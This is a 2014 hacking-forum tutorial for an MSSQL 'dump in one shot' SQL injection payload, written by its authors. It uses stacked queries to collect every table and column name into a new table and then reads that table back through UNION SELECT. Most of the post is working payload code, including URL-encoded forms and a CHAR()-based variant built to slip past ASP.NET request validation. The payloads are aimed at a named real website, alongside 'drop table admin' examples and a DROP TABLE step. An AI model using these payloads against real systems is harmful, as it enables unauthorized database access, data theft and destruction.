Старый 06.09.2014, 05:14   #1
rummykhan
 
Регистрация: 01.09.2014
Сообщений: 1
Репутация: 0
По умолчанию Retrieving all tables and their columns at once MSSQL

In the Name of ALLAH the Most Beneficent and the Merciful

Zenodermus, Ch3rn0by1 and Me was workinn on MSSQL..
when Zenodermus thought to make a DIOS for MSSQL..

previously at
Код:
http://websec.ca/kb/sql_injection
DIOS is under the heading Retrieving Multiple Tables and Columns

Код:
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
but thats output is like

table1:column1
table1:column2
table1:column3
table2:column1
table2:column2
table2:column3
table3:column1
and so on..

but after adding some cosmetics to this query.. by Zenodermus.. it became Cool like this u can see in this pic..



but due to Character limit in available dataype VARCHAR(8000) we cannot see the complete output(mean all tables and columns).. jux because each time table is written with each column..

so we decided to make it more cool and tried to display all data..
mean complete tables and columns list..
and later after surfing on MSDN, Google and MSSQL documentation we came to know..
that actual length of varchar(MAX) or varchar(8000) is not 8000 it is 4000 even when u declare it MAX or 8000

and than it became our obsession to make it.. and now our final query output is.. like this..



well before Going into this you must know about Stacked Queries..
i will recommend to read the complete article at
Код:
http://www.sqlinjection.net/stacked-queries/
and in simple words..
With Stacked Queries we can Execute multiple statements in the same query to extend the possibilities of SQL injections

eg..
Код:
SELECT * FROM products WHERE productid=1; drop table admin
realistic example..
Код:
http://site.com/page.aspx?id=1; Drop table admin-- -
and STACKED QUERY SUPPORT.
Код:
MySQL/PHP - Not supported (supported by MySQL for other API).
SQL Server/Any API - Supported.
Oracle/Any API - Not supported.
Our Final Query is..

Код:
BEGIN
DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100)
DECLARE @tmpTbl TABLE (name VARCHAR(8000) NOT NULL)
SET @counter = 1
SET @data = 'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME()
SET @tblName = ''
SET @colNames = ''
WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES)
BEGIN
	SET @colNames = ''
	SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @tmpTbl)
	SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName
	INSERT @tmpTbl VALUES(@tblName)
	SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames
	SET @counter = @counter + 1
END
SELECT @data AS output INTO Challenge
END
Well This Query looks horible but it actually is not..
Lets go deep into this Query...

with BEGIN and END we declare a Batch/Group of statements to b executed togather..

next step is declaring supporting variables for holding table_name, column_name, a counter, one variable that can hold all table_names and column_names and one table with one column which will be acting as a collection which will be used to hold all the tables names.. will explain its use later

next step is initializing declared variables.. we cannot use these un-initialized variables in SELECT statement..
thats why these are initialized with empty strings.. and @data with database version and database for further display in output..

next step is WHILE Loop
this statement
Код:
WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES)
will bound this loop to run through all tables..

at next step @colNames is re initialized with empty string everytime to hold the coloums of Only One table at a time..

next step is getting a table_name into @tblName and getting column_name for that table into @colNames and adding values of both @tblName and @colNames into @data

Now explaining this part
Код:
SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @tmpTbl)
with this Query
Код:
SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME
only one table will be fetched..
To get next table in next iteration we used NOT IN Clause..
but NOT IN Clause need a collection for which we declared a TABLE @tmpTbl with a COLUMN named name

for first time @tmpTbl will b empty so first table_name will b retrieved in @tblName
and here in this part..
Код:
INSERT @tmpTbl VALUES(@tblName)
each time @tblName value will b inserted in @tmpTbl
and when it will goto this line again
Код:
SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @tmpTbl)
next table will b retrieved from this statement and so on... as @tmpTbl have first table_name now.. and so on..

when the loop will end.. all tables and columns will be added in @data..

and than with this statement
Код:
SELECT @data AS output INTO Challenge
we can store all @data into new table Challenge

to use it in the query
Код:
http://site.com/page.aspx?id=1;BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @tmpTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data = +'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @tmpTbl) SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @tmpTbl VALUES(@tblName) SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames SET @counter = @counter + 1 END SELECT @data AS output INTO Challenge END-- -
now change + with %2b becuase + is taken as space when sent from URL

for the Challenge site our final query will be like
Код:
http://www.uwdmaindia.org/EventDetails.aspx?ID=3';BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @tmpTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data=' injected by rummykhan :: '%2b@@version%2b'<br/>'%2bdb_name() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @tmpTbl) SELECT @colNames = @colNames %2b' : '%2bcolumn_name  FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @tmpTbl VALUES(@tblName) SET @data=@data%2b'<br/><br/>Table : '%2b@tblName%2b'<br/>Columns : '%2b@colNames%2b'<br/>' SET @counter = @counter %2b 1 END SELECT @data AS output INTO Challenge END-- -
and now the final part of the Challenge.. and STEP 2
how to see the output on web page..
Код:
http://site.com/page.aspx?id=-1 union select 1,2,3,output,5 from Challenge-- -
and in Challenge Case..
Код:
http://www.uwdmaindia.org/EventDetails.aspx?ID=0' union all select 1,2,3,4,5,output,7,8 from Challenge-- -
running first query multiple time will result in error that an object of Challenge already exist..
so dont forget to drop that table after running the query first time..
Код:
http://www.uwdmaindia.org/EventDetails.aspx?ID=0'; DROP TABLE Challenge-- -
and in some cases where System.Web.HttpException is enabled there.. it take HTML tags as dangerous requests
so i changed these to MSSQL CHAR() .. and Now this will work fine in almost every scenario.. and variable names are also shortened reason is same System.Web.HttpException of ASP.Net cannot parse long query..

Код:
;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by rummykhan :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Chall1 END-- -
author of this DIOS : Zenodermus & rummykhan

thanx a lot for reading this lengthy tutorials.. but i think this deserve ur time.. because it is entirely a new thing in MSSQL.. there was no DIOS existing of this much completeness..

Happy Injecting :bh:

Greetz :
Ch3rn0by1 : Lafangoo : Connecting : exploiter-z : PMH~Str!k3r : Gujjar(PCP) : MakMan : madcodE : Ajkaro : Blackhawk : benzi : t.Pro : h4x0r : Sho0Ter
rummykhan вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot